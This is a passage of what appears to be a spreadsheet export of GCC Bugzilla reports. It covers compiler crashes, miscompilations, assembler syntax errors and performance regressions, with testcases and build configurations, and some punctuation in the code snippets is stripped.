g++ -march=athlon64 -masm=intel -O3 -fomit-frame-pointer -o test.o -c test.cpp
Causes the compile to fail with:
Assembler messages: Error: expecting string instruction after `rep'
The assembly being:
_Z15CheckTVRatioReqv:
.LFB2:
        xor     %eax %eax
        cmp     BYTE PTR Keep4_3Ratio 0
        je      .L4
        cmp     DWORD PTR DSMode 1
        mov     %al 1
        je      .L4
        xor     %eax %eax
        cmp     DWORD PTR SMode 1
        sete    %al
.L4:
        rep  ret
rep ret is an invalid instruction.
I've tested with the following 32 bit compilers:
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --program-suffix=-4.1 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-mpfr --with-tune=i686 --enable-checking=release i486-linux-gnu
Thread model: posix
gcc version 4.1.2 20060928 (prerelease) (Debian 4.1.1-15)
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++javafortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --program-suffix=-4.2 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-java-awt=gtk-defaultqt-default --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-4.2-1.4.2.0/jre --enable-objc-gc --enable-mpfr --with-tune=generic --enable-checking=release i486-linux-gnu
Thread model: posix
gcc version 4.2.0 20060709 (experimental) (Debian 4.2-20060709-1)
Using built-in specs.
Target: i586-msdosdjgpp
Configured with: ./configure --target=i586-msdosdjgpp --prefix=/usr --disable-nls --enable-languages=cc++ --with-headers=/usr/i586-msdosdjgpp/sys-include
Thread model: single
gcc version 4.1.0
Reading specs from /usr/i586-mingw32/lib/gcc/i586-mingw32/3.4.5/specs
Configured with: ../configure --prefix=/usr/i586-mingw32 --with-gcc --with-gnu-ld --with-gnu-as --target=i586-mingw32 --enable-threads --disable-nls --enable-languages=cc++f77adaobjcjava --disable-win32-registry --disable-shared --enable-sjlj-exceptions --enable-libgcj --disable-java-awt --without-x --enable-java-gc=boehm --disable-libgcj-debug --enable-interpreter --enable-hash-synchronization --disable-libstdcxx-debug
Thread model: win32
gcc version 3.4.5 (mingw special)
Reading specs from ../lib/gcc/mingw32/3.4.5/specs
Configured with: ../gcc-3.4.5/configure --with-gcc --with-gnu-ld --with-gnu-as --host=mingw32 --target=mingw32 --prefix=/mingw --enable-threads --disable-nls --enable-languages=cc++f77adaobjcjava --disable-win32-registry --disable-shared --enable-sjlj-exceptions --enable-libgcj --disable-java-awt --without-x --enable-java-gc=boehm --disable-libgcj-debug --enable-interpreter --enable-hash-synchronization --enable-libstdcxx-debug
Thread model: win32
gcc version 3.4.5 (mingw special)
Using built-in specs.
Target: djgpp
Configured with: /gnu/gcc-4.10/configure djgpp --prefix=/dev/env/DJDIR --disable-nls --disable-werror --enable-languages=cc++fortranobjcobj-c++ada
Thread model: single
gcc version 4.1.0
Interestingly enough it did not fail when using this version of GCC:
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++java --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --program-suffix=-4.0 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-java-awt=gtk-default --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-4.0-1.4.2.0/jre --with-tune=i686 --enable-checking=release i486-linux-gnu
Thread model: posix
gcc version 4.0.4 20060904 (prerelease) (Debian 4.0.3-7)
Although I suspect if I played with the options more I can get it to fail with that GCC too.
Now when using the same case with an x86-64 compile and the following options:
g++ -march=athlon64 -masm=intel -o test.o -c test.cpp
I get the following errors:
Assembler messages:
Error: invalid operand for 'movzx' ('(' unexpected)
Error: invalid operand for 'mov' ('(' unexpected)
Error: invalid operand for 'mov' ('(' unexpected)
Assembly being:
_Z15CheckTVRatioReqv:
.LFB2:
        push    %rbp
.LCFI0:
        mov     %rbp %rsp
.LCFI1:
        movzx   %eax BYTE PTR Keep4_3Ratio(%rip)
        test    %al %al
        je      .L2
        mov     %rax QWORD PTR DSMode(%rip)
        cmp     %rax 1
        je      .L4
        mov     %rax QWORD PTR SMode(%rip)
        cmp     %rax 1
        jne     .L2
.L4:
        mov     BYTE PTR [%rbp-1] 1
        jmp     .L6
.L2:
        mov     BYTE PTR [%rbp-1] 0
.L6:
        movzx   %eax BYTE PTR [%rbp-1]
        leave
        ret
I don't know AMD64 assembly well but Keep4_3Ratio(%rip) and the like doesn't look right to me.
If I add -O3 so the line becomes:
g++ -O3 -march=athlon64 -masm=intel -o test.o -c test.cpp
I get cmp bugs instead of mov and I also get the rep ret bug from above when using GCC 4.1 (but not 4.0).
My 64 bit compilers:
Using built-in specs.
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++java --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --program-suffix=-4.0 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-4.0-1.4.2.0/jre --enable-checking=release x86_64-linux-gnu
Thread model: posix
gcc version 4.0.4 20060904 (prerelease) (Debian 4.0.3-7)
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --program-suffix=-4.1 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-mpfr --enable-checking=release x86_64-linux-gnu
Thread model: posix
gcc version 4.1.2 20060928 (prerelease) (Debian 4.1.1-15)
I've conducted this test on two different PCs one running WinXP SP2 and the other Debian Unstable.</t>
  </si>
  <si>
    <t>rask</t>
  </si>
  <si>
    <t>nachms+gcc</t>
  </si>
  <si>
    <t>GCC-35148</t>
  </si>
  <si>
    <t>make pdf has missing file in 4.3-20080208</t>
  </si>
  <si>
    <t>I built a copy of gcc-4.3-20080208.tar.bz2 on a powerbook g4 OS X 10.4.11 xcode 2.5 with the only configure option being --enable-languages=cc++fortran.  The build worked fine but when I entered make pdf after the build was done it was ran into trouble with gcc/doc/gcc.texi because of a missing file:
! I can't find file `../../gcc-4.3-20080208/gcc/../libiberty/at-file.texi'.
@includezzz ...#1}{@makevalueexpandable @input #1 
                                                  }@popthisfilestack 
l.1244 ...@value{srcdir}/../libiberty/at-file.texi
If I enter x tex continues but then this bug is encountered again on subsequent documents.
I have been able to build the pdf files before on this same setup but recently I've only done this after a full build (i.e. configure with no options meaning that other things including java are built and the full build takes much longer).  I know I've been able to do a make pdf successfully in the past after only building cc++fortran but I haven't tried this on a gcc 4.3 snapshot for a while so I can't say for sure if the difference in the configure options contributes to the problem or not.</t>
  </si>
  <si>
    <t>GCC-28167</t>
  </si>
  <si>
    <t>ICE: in fold_binary at fold-const.c:8239 (temporary character array?)</t>
  </si>
  <si>
    <t>Here's another ICE probably related to temporary character arrays:
gfcbug34.f90: In function 'MAIN__':
gfcbug34.f90:1: internal compiler error: in fold_binary at fold-const.c:8239
It dies on:
  call foo ( (/ (' 'i=1m) /) )
Testcase attached.
Cheers
-ha</t>
  </si>
  <si>
    <t>GCC-10803</t>
  </si>
  <si>
    <t>wrong constant value generated by g++ -O</t>
  </si>
  <si>
    <t>gcc-3.2.3 with -O or higher optimization
generates bad code for attached bug.ii. 
When I compile this code with g++ -O
and execute it 
the standerd output says:
  a1[1]=11   a2[1]=21
x.a1[1]=21 x.a2[1]=21
The expected standard output is:
  a1[1]=11   a2[1]=21
x.a1[1]=11 x.a2[1]=21
(a1[1] is constant and should be 11)
Release:
3.2.3
Environment:
Redhat-7.3(kernel:2.4.20-13.7 glibc:2.2.5-43 binutils-2.11.93.0.2-11) on pentium3 dual cpu machine
Configuration option for gcc:
--prefix=/opt/local --enable-shared --enable-threads=posix --enable-languages=cc++f77
How-To-Repeat:
g++ -O bug.ii &amp;&amp; ./a.out</t>
  </si>
  <si>
    <t>kakuno</t>
  </si>
  <si>
    <t>GCC-11723</t>
  </si>
  <si>
    <t>ctype::do_is(mask wchar_t) is slow</t>
  </si>
  <si>
    <t>ctype calls wctype every time iswctype is called. This makes
ctype very slow.</t>
  </si>
  <si>
    <t>GCC-14658</t>
  </si>
  <si>
    <t>[lno] segfault when calling function twice in a loop</t>
  </si>
  <si>
    <t>The lno-branch segfaults when the following code snippet is compiled
with -O2 -floop-optimize2:
==================================================
struct A
{
    ~A()
    void foo(double)
}
void bar()
{
    for ( int i=0 i&lt;2 ++i )
    {
        A a
        a.foo(0.5)
        a.foo(0.5)
    }
}
==================================================
The regression was introduced by the Zdenek's patch:
http://gcc.gnu.org/ml/gcc-cvs/2004-03/msg00455.html
http://gcc.gnu.org/ml/gcc-patches/2004-03/msg00772.html
Zdenek could you please have a look?</t>
  </si>
  <si>
    <t>GCC-49019</t>
  </si>
  <si>
    <t>[4.4 Regression] Spurious aliasing warning with boost:optional</t>
  </si>
  <si>
    <t>On the attached testcase with g++ -O2 -Wall g++ emits a couple of
/home/ts/pack/boost_1_46_1/boost/optional/optional.hpp:346: warning: dereferencing pointer â€˜pretmp.811â€™ does break strict-aliasing rules
warnings.  Works fine with 4.3 or 4.5/4.6/4.7 (on the trunk it went away
with http://gcc.gnu.org/viewcvs?root=gcc&amp;view=rev&amp;rev=147805 which is clearly not backportable) or with -fno-tree-pre -fno-tree-fre.
The warning is about a pointer var with def_stmt being &amp; of a may_alias union inside aligned_storage wonder why if (bitmap_empty_p (pi-&gt;pt_vars)) is true
in find_what_p_points_to and doesn't say at least that it can point to what it has been initialized to.  Richard is there anything that can be done about this
for 4.4 or is it too risky?</t>
  </si>
  <si>
    <t>GCC-21185</t>
  </si>
  <si>
    <t>Improve testsuite results on newlib targets</t>
  </si>
  <si>
    <t>fortran.log shows that functions not present in newlib are referenced:
Executing on host: /home/hp/combined/cris-sim/gcc/testsuite/../gfortran
-B/home/hp/combined/cris-sim/gcc/testsuite/../ /home/hp/c\
ombined/combined/gcc/testsuite/gfortran.dg/PR19754_2.f90   -O0  
-pedantic-errors   -isystem /home/hp/combined/cris-sim/cris-elf/\
./newlib/targ-include -isystem /home/hp/combined/combined/newlib/libc/include
-B/home/hp/combined/cris-sim/cris-elf/./libgloss/cr\
is/ -L/home/hp/combined/cris-sim/cris-elf/./libgloss/cris
-L/home/hp/combined/combined/libgloss/cris -L/home/hp/combined/cris-sim\
/ld -B/home/hp/combined/cris-sim/cris-elf/./newlib/
-L/home/hp/combined/cris-sim/cris-elf/./newlib -sim3  -L/home/hp/combined/cri\
s-sim/cris-elf/./libgfortran/.libs
-L/home/hp/combined/cris-sim/cris-elf/./libiberty  -lm   -o ./PR19754_2.exe   
(timeout = 300)
/home/hp/combined/cris-sim/cris-elf/./libgfortran/.libs/libgfortran.a(unix.o):
In function `fd_truncate':^M
/home/hp/combined/combined/libgfortran/io/unix.c:516: undefined reference to
`_ftruncate'^M
/home/hp/combined/cris-sim/cris-elf/./libgfortran/.libs/libgfortran.a(unix.o):
In function `fix_fd':^M
/home/hp/combined/combined/libgfortran/io/unix.c:198: undefined reference to
`_dup'^M
/home/hp/combined/combined/libgfortran/io/unix.c:208: undefined reference to
`_dup'^M
/home/hp/combined/combined/libgfortran/io/unix.c:203: undefined reference to
`_dup'^M
/home/hp/combined/cris-sim/cris-elf/./libgfortran/.libs/libgfortran.a(unix.o):
In function `inquire_access':^M
/home/hp/combined/combined/libgfortran/io/unix.c:1443: undefined reference to
`_access'^M
collect2: ld returned 1 exit status^M</t>
  </si>
  <si>
    <t>GCC-24638</t>
  </si>
  <si>
    <t>inconsistent use of Jv_FindClass causing too weak error condition</t>
  </si>
  <si>
    <t>Jv_FindClass throws a ClassNotFoundException in case the requested class cannot be resolved (regardless of whether the bytecode missing or a further dependency cannot be resolved).
This causes problems because in case of serious bytecode errors (eg. the class of a field is missing) where a NoClassDefFoundError should reach the user code.
I found code in several places in gcj where the caller of Jv_FindClass expected NULL to be returned. This affects Jv_FindClassFromSignature too because it depends on the former function.
Obviously such code will not be executed (unless the Jv_FindClass takes a special codepath where it call Jv_FindClassInCache).
- link.cc: around line 1000 look for:
if (target_class == NULL)
	throw new java::lang::NoClassDefFoundError 
	  (_Jv_NewStringUTF (sym.class_name-&gt;chars()))
- verify.cc: around 387 look for
	  data.klass = _Jv_FindClassFromSignature (data.name-&gt;chars() loader)
	  if (data.klass == NULL)
	    throw new java::lang::NoClassDefFoundError(data.name-&gt;toString())
I want to hear what the experts have to say about that. My suggestion would be to introduce a special variant of Jv_FindClass which does not throw a ClassNotFoundException (by swallowing it) and then carefully adjusting the code location where the old variant was used.</t>
  </si>
  <si>
    <t>GCC-50527</t>
  </si>
  <si>
    <t>inconsistent vla align</t>
  </si>
  <si>
    <t>Created attachment 25367
testcase modified from pr43513.c testcase
To reproduce on x86_64:
...
$ gcc -Os pr43513-align.c --param large-stack-frame=30
$ ./a.out 
16byte aligned
7fff5c4ce00c
...
The address of the vla is printed and it's not 16-byte aligned (ends in 'c'). Nevertheless the test whether the address is 16-byte aligned succeeds and the string '16byte aligned' is printed.
During compilation the following scenario happens:
- During the propagation of the first ccp phase the align of the alloca (16)
  is progagated to the lhs results.0D.3306_13 as lattice value
  'CONSTANT 0x00000000000000000 (0xfffffffffffffffffffffffffffffff0)'.
- This not propagated through 'D.3307_14 = &amp;*results.0D.3306_13'. The
  propagation does not look at the lattice value of results.0D.3306_13 but at
  the alignment of the ptr_info which at this point is not initialised yet.
- During the finalize of the first ccp phase ptr_info of results.0D.3306_13 is
  initialized with align 16 based on the lattice value.
- During the propagation of the second ccp phase the align of the ptr_info
  of results.0D.3306_13 of 16 is used to propagate through to the comparison
  'if (D.3309_16 == 0)' which makes sure the '16byte aligned' string is
  printed.
- During the finalize of the second ccp phase the alloca is folded and
  the new declared array gets an align of 4 bytes.</t>
  </si>
  <si>
    <t>GCC-63743</t>
  </si>
  <si>
    <t>Thumb1: big regression for float operators by r216728</t>
  </si>
  <si>
    <t>Created attachment 33887
test case
Root cause: the fold_stmt swaps the operands which leads to register shuffle.
commit f619ecaed41d1487091098a0f4fdf4d6ed1fa379
Author: rguenth 
Date:   Mon Oct 27 11:30:23 2014 +0000
    2014-10-27  Richard Biener  
        * tree-ssa-forwprop.c: Include tree-cfgcleanup.h and tree-into-ssa.h.
        (lattice): New global.
        (fwprop_ssa_val): New function.
        (fold_all_stmts): Likewise.
        (pass_forwprop::execute): Finally fold all stmts.
        * gcc.dg/tree-ssa/forwprop-6.c: Scan ccp1 dump instead.
        * gcc.dg/strlenopt-8.c: Adjust and XFAIL for non_strict_align
        target due to memcpy inline-expansion.
    git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@216728 138bc75d-0d04-0410-961f-82ee72b054a4
A simplified case is attached.
Options: -mthumb -Os -mcpu=cortex-m0
Before the patch tree codes like
_20 = _14 + _19
_21 = _20 * x_13
After the patch tree codes like
_20 = _14 + _19
_21 = x_13 * _20
Without HARD fpu support all operators will be changed to function calls. The assemble codes change like:
Before the patch
        bl      __aeabi_dadd
        ldr     r2 [sp]
        ldr     r3 [sp #4]
        /* r0 r1 are reused from the return values of the previous call. */
        bl      __aeabi_dmul
After the patch
        bl      __aeabi_dadd
        mov     r2 r0
        mov     r3 r1
        ldr     r0 [sp]
        ldr     r1 [sp #4]
        bl      __aeabi_dmul</t>
  </si>
  <si>
    <t>GCC-20881</t>
  </si>
  <si>
    <t>should check interfaces for lgobal procedures</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
SUBROUTINE TT()
 CHARACTER(LEN=*) EXTERNAL :: F
 CHARACTER(LEN=10)          :: T
 T=F()
END SUBROUTINE TT
END
SUBROUTINE F
END SUBROUTINE</t>
  </si>
  <si>
    <t>GCC-16792</t>
  </si>
  <si>
    <t>[4.0 regression] ICE in gen_subprogram_die at dwarf2out.c:11267</t>
  </si>
  <si>
    <t>The following program compiled with g++ -g gives 
internal compiler error: in gen_subprogram_die at dwarf2out.c:11267 
struct S { S() } 
int foo (S b double j) { } 
int main () 
{ 
  int foo (S double) 
  S v 
}</t>
  </si>
  <si>
    <t>GCC-53395</t>
  </si>
  <si>
    <t>[4.8 Regression] The LAPACK functions i(d|s)amax are more than two times slower after revision 187183</t>
  </si>
  <si>
    <t>As noted in pr53346 the LAPACK functions i(d|s)amax compiled with '-O3 -ffast-math -funroll-loops' are more than two times slower after revision 187183 on x86_64-apple-darwin10 as shown by the following results for a reduced version of idamax (increment one only)
[macbook] test/dbg_rnflow% cat idamax_red.f90
      integer function idamax(ndx)
!
      double precision dx(*)dmax
      integer in
!
      idamax = 1
   20 dmax = dabs(dx(1))
      do 30 i = 2n
         if(dabs(dx(i)).le.dmax) go to 30
         idamax = i
         dmax = dabs(dx(i))
   30 continue
      return
      end
[macbook] test/dbg_rnflow% cat tst_idamax_red.f90
implicit none
integer parameter :: n = 40000
integer :: i j res(n+1)
integer :: idamax
external idamax
real(8) :: x dx a(n+1)
dx = 2.0/real(n kind=8)
do i = 0 n
    x = dx*real(i kind=8) - 1.0
    a(i+1) = 1-2.0*(1-2.0*x**2)**2-0.1_8*x
end do
res = 0
do i = 0 n
    j = idamax(n+1 a)
    res(i+1) = j
    a(i+1) = a(i+1) + 0.1_8
end do
print * sum(res)
end
[macbook] test/dbg_rnflow% /opt/gcc/gcc4.8p-187182/bin/gfortran -c -O3 -ffast-math -funroll-loops idamax_red.f90
[macbook] test/dbg_rnflow% gfc tst_idamax_red.f90 idamax_red.o
[macbook] test/dbg_rnflow% time a.out
   386062110
2.474u 0.002s 0:02.47 100.0%	0+0k 0+0io 0pf+0w
[macbook] test/dbg_rnflow% /opt/gcc/gcc4.8p-187183/bin/gfortran -c -O3 -ffast-math -funroll-loops idamax_red.f90
[macbook] test/dbg_rnflow% gfc tst_idamax_red.f90 idamax_red.o
[macbook] test/dbg_rnflow% time a.out
   386062110
5.561u 0.004s 0:05.56 100.0%	0+0k 0+0io 0pf+0w</t>
  </si>
  <si>
    <t>GCC-79556</t>
  </si>
  <si>
    <t>[7 Regression] [C++1z] ICE: in unify_one_argument at cp/pt.c:18928</t>
  </si>
  <si>
    <t>Reported on http://stackoverflow.com/questions/42260453/how-to-report-this-ice-for-gcc-trunk:
markus@x4 /tmp % cat foo.ii
template  struct A
template  struct B
template  struct B {
  static auto a = A::value&gt;::value
}
markus@x4 /tmp % g++ -c -std=c++1z foo.ii
foo.ii:4:38: internal compiler error: in unify_one_argument at cp/pt.c:18928
   static auto a = A::value&gt;::value
                                      ^
0x65de64 unify_one_argument
        /home/markus/gcc/gcc/cp/pt.c:18928
0x66b594 type_unification_real
        /home/markus/gcc/gcc/cp/pt.c:19083
0x630b2b do_auto_deduction(tree_node* tree_node* tree_node* int auto_deduction_context tree_node* int)
        /home/markus/gcc/gcc/cp/pt.c:25250
0x6595a2 convert_template_argument
        /home/markus/gcc/gcc/cp/pt.c:7615
0x65ba40 coerce_template_parms
        /home/markus/gcc/gcc/cp/pt.c:8109
0x66286a lookup_template_class_1
        /home/markus/gcc/gcc/cp/pt.c:8633
0x66286a lookup_template_class(tree_node* tree_node* tree_node* tree_node* int int)
        /home/markus/gcc/gcc/cp/pt.c:8978
0x7794ff finish_template_type(tree_node* tree_node* int)
        /home/markus/gcc/gcc/cp/semantics.c:3151
0x70075c cp_parser_template_id
        /home/markus/gcc/gcc/cp/parser.c:15512
0x70098e cp_parser_class_name
        /home/markus/gcc/gcc/cp/parser.c:21964
0x6fd1fc cp_parser_qualifying_entity
        /home/markus/gcc/gcc/cp/parser.c:6284
0x6fd1fc cp_parser_nested_name_specifier_opt
        /home/markus/gcc/gcc/cp/parser.c:5970
0x7029a6 cp_parser_simple_type_specifier
        /home/markus/gcc/gcc/cp/parser.c:16837
0x6f56cb cp_parser_postfix_expression
        /home/markus/gcc/gcc/cp/parser.c:6697
0x6f679f cp_parser_unary_expression
        /home/markus/gcc/gcc/cp/parser.c:8124
0x6f774b cp_parser_cast_expression
        /home/markus/gcc/gcc/cp/parser.c:8801
0x6f7e4c cp_parser_binary_expression
        /home/markus/gcc/gcc/cp/parser.c:8902
0x6f8806 cp_parser_assignment_expression
        /home/markus/gcc/gcc/cp/parser.c:9189
0x6f8c2c cp_parser_constant_expression
        /home/markus/gcc/gcc/cp/parser.c:9459
0x6f9ba9 cp_parser_initializer_clause
        /home/markus/gcc/gcc/cp/parser.c:21586
Clang accepts the code.</t>
  </si>
  <si>
    <t>GCC-56477</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE on invalid with pointer assignment to function result</t>
  </si>
  <si>
    <t>The following causes an ICE with gfortran 4.8.0 r196316:
module s
contains
  function so()
    implicit none
    integer target  :: so
    integer pointer :: sp
    sp =&gt; so
    return
  end function So
end module s
$ gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/home/abenson/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/home/abenson --enable-languages=cc++fortran --disable-multilib --with-gmp=/home/abenson
Thread model: posix
gcc version 4.8.0 20130227 (experimental) (GCC) 
$ gfortran -c -o ICEtest.o ICEtest.F90 -Wall
f951: internal compiler error: Segmentation fault
0x92f79f crash_signal
        ../../gcc-trunk/gcc/toplev.c:332
0x4fdbf2 gfc_check_pointer_assign(gfc_expr* gfc_expr*)
        ../../gcc-trunk/gcc/fortran/expr.c:3734
0x5555d6 resolve_code
        ../../gcc-trunk/gcc/fortran/resolve.c:10261
0x557c5e resolve_codes
        ../../gcc-trunk/gcc/fortran/resolve.c:14972
0x557b67 resolve_codes
        ../../gcc-trunk/gcc/fortran/resolve.c:14958
0x548aa2 gfc_resolve
        ../../gcc-trunk/gcc/fortran/resolve.c:15000
0x53d186 gfc_parse_file()
        ../../gcc-trunk/gcc/fortran/parse.c:4608
0x579415 gfc_be_parse_file
        ../../gcc-trunk/gcc/fortran/f95-lang.c:189
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
The -Wall is important - without the code compiles without complaint.
I tagged this as invalid(?) because I don't think that giving the function return value the TARGET attribute makes sense although I couldn't find anything that clearly says it's not allowed.</t>
  </si>
  <si>
    <t>GCC-70963</t>
  </si>
  <si>
    <t>vec_cts/vec_ctf intrinsics produce wrong results for 64-bit floating point</t>
  </si>
  <si>
    <t>Created attachment 38420
small test program to verify vec_cts/vec_ctf working on doubles
I've noticed some tests in Eigen failing for VSX 64-bit doubles code when the algorithm looked perfectly normal. Further investigation -and comparison with direct output using same inputs from an SSE test program showed that the conversion to integer yielded 0 results in the case of VSX (vec_cts basically returned 0 vectors). I've written a small test case that verifies this on both big/little endian VSX-capable systems (compiled with -m64 -mvsx). When using the intrinsic the result is wrong when using the inline asm version it works as expected. I could not test it in a more recent gcc so it may well be fixed however it would be great if this would be backported to gcc 5.
Some asm output follows from test program (attached):
vec_cts:
    1000066c:   60 67 00 f0     xvcvdpsxds vs0vs12
    10000670:   50 02 00 f0     xxswapd vs0vs0
asm:
    10000674:   51 02 00 f0     xxswapd vs32vs0
    10000678:   60 07 00 f0     xvcvdpsxds vs0vs0
    1000067c:   56 02 00 f0     xxswapd vs0vs32
vec_ctf:
    100006f8:   50 02 00 f0     xxswapd vs0vs0
    100006fc:   e0 07 00 f0     xvcvsxddp vs0vs0
    10000700:   50 02 00 f0     xxswapd vs0vs0
asm:
    100006f8:   51 02 00 f0     xxswapd vs32vs0
    100006fc:   e0 07 00 f0     xvcvsxddp vs0vs0
    10000700:   56 02 00 f0     xxswapd vs0vs32</t>
  </si>
  <si>
    <t>GCC-21112</t>
  </si>
  <si>
    <t>Xassembler and Xpreprocessor does not  worked</t>
  </si>
  <si>
    <t>The Xassembler and Xpreprocessor options don't work.  They accidentally pass
options to the linker in addition to the assembler and preprocessor.
For example on linux the assembler ignores the -D option but the linker does
not.  If I try using -Xassembler to pass the -D option to the assembler I get a
linker error.
aretha$ ./xgcc -B./ -Xassembler -D tmp.c
/usr/bin/ld: unrecognized option '-D'
/usr/bin/ld: use the --help option for usage information
collect2: ld returned 1 exit status
Adding the -v option confirms that -D got passed to both the assembler and the
linker which is wrong.
The -Xpreprocessor option has the same implementation as -Xassembler and hence
the same problem.</t>
  </si>
  <si>
    <t>GCC-8397</t>
  </si>
  <si>
    <t>[sh-coff] miscompilation with many local variables</t>
  </si>
  <si>
    <t>If the size of the automatic variables becomes large when there is no flag specification of optimization the code which accesses the variable which made a register declaration is wrong.
source code:
    len -= size
generated assembler code:
        mov     #64r2
        add     r14r2
        mov     #64r2
        add     r14r2
        mov.l   @(4r2)r1
        mov.l   @(8r2)r2
        sub     r2r1
        mov.l   r1@(4r2)
        bra     L2
        nop
Release:
gcc-3.2
Environment:
NetBSD/PowerPC-1.5.2 gcc-3.0.3
How-To-Repeat:
compile: sh-coff-gcc -S fff.c
fff.c: see below
fff(len size)
        register int len
        register int size
{
        char buf[58]
        char *ps
        char *pe
        while (len &lt; size) {
                len -= size
        }
}</t>
  </si>
  <si>
    <t>GCC-4326</t>
  </si>
  <si>
    <t>sparcv9-sun-solaris2.7 testsuite failures.</t>
  </si>
  <si>
    <t>After building the compiler and running a make check in the gcc dir the following tests fail. 
( all of the f77 and objc fail because no support was built for them.. )
Release:
gcc-3.0.1
Environment:
gcc3 -v
Reading specs from /pkg/gcc/gcc__v3.0.1.dist/gcc/lib/gcc-lib/sparcv9-sun-solaris2.7/3.0.1/specs
Configured with: ../configure --prefix=/pkg/gcc/gcc__v3.0.1.dist/gcc --enable-shared --enable-static --x-includes=/usr/openwin/include --x-libraries=/usr/openwin/lib --host=sparcv9-sun-solaris2.7 --target=sparcv9-sun-solaris2.7 --enable-languages=cc++</t>
  </si>
  <si>
    <t>jack-gcc</t>
  </si>
  <si>
    <t>GCC-15612</t>
  </si>
  <si>
    <t>Bug box in Gigi code=103 on illegal program</t>
  </si>
  <si>
    <t>package Test_244945 is
   type T (n: Natural := 10) is private
    type acct is access t(3)
    x: acct
    y: integer := x.n
private
   type T (n: Natural := 10) is null record
end Test_244945
I was expectoing an error message like this:
test_244945:7:22: no default value allowed for discriminant N
Instead I get:
+===========================GNAT BUG DETECTED==============================+
| 3.4.0 (Debian) (i486-pc-linux-gnu) Gigi abort Code=103                  |
| Error detected at test_244945.ads:5:19                                   |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc-3.4 or gnatmake command that you entered.          |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+</t>
  </si>
  <si>
    <t>GCC-31058</t>
  </si>
  <si>
    <t>overflow warnings should not be enabled with -Wall</t>
  </si>
  <si>
    <t>building this testcase with -O2 -march=athlon -Wall -fprefetch-loop-arrays
gives:
warning: array subscript is above array bounds
[...]
which according to VRP seems to be valid. 
testcase is:
=== Cut ===
struct real_value
{
  unsigned int cl:2
  unsigned int decimal:1
  unsigned long sig[5]
}
unsigned int uexp
static void
clear_significand_below (struct real_value *r unsigned int n)
{
  int i w = n / 32
  for (i = 0 i &lt; w ++i)
    r-&gt;sig[i] = 0
}
void
do_fix_trunc (struct real_value *r)
{
  if (uexp &lt; 160)
    clear_significand_below (r 160 - uexp)
}
=== Cut ===</t>
  </si>
  <si>
    <t>GCC-7221</t>
  </si>
  <si>
    <t>wrong linkage of typedef-named classes</t>
  </si>
  <si>
    <t>Given:
  typedef struct {
    void f()
  } S
GCC will assume f has no linkage because at the point of the declaration the class is anonymous.
Details at http://gcc.gnu.org/ml/gcc-patches/2002-07/threads.html#00266
Release:
gcc-3.1
Environment:
3.2 as well as many (all?) older releases and newer snapshots
any
How-To-Repeat:
Testcase is g++.old-deja/g++.oliva/linkage1.C</t>
  </si>
  <si>
    <t>GCC-42769</t>
  </si>
  <si>
    <t>[OOP] ICE  in resolve_typebound_procedure</t>
  </si>
  <si>
    <t>The attached source file produces the error with a fresh trunk checkout at r155958.
[sfilippo@localhost bugr1]$ gfortran -c  psb_s_tools_mod.f90
psb_s_tools_mod.f90:6363:0: internal compiler error: in resolve_typebound_procedure at fortran/resolve.c:10023
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[sfilippo@localhost bugr1]$ gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/usr/local/gnu45/libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc/configure --prefix=/usr/local/gnu45 --enable-languages=cc++fortran
Thread model: posix
gcc version 4.5.0 20100116 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-66894</t>
  </si>
  <si>
    <t>[6 Regression] wrong code at -Os and above on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The current gcc trunk mis-compiles the following code on x86_64-linux-gnu at -Os and above in both 32-bit and 64-bit modes. 
This is a regression from 5.1.x.
It is possibly related to PR 66863 which has just been fixed. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
